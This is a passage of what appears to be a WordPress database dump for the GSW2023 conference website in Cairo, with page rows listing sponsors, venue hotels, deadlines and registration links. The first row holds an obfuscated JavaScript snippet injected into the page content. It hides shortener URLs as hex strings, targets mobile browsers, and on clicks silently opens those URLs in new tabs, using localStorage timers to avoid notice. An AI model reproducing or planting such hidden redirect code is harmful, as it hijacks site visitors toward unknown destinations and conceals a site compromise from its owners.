\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-18 02:53:37','2023-05-18 02:53:37','',3066,'https://gsw2023.com/?p=4553',0,'revision','',0),
(4554,1,'2023-05-18 03:01:25','2023-05-18 03:01:25','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">Conference Venue </span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 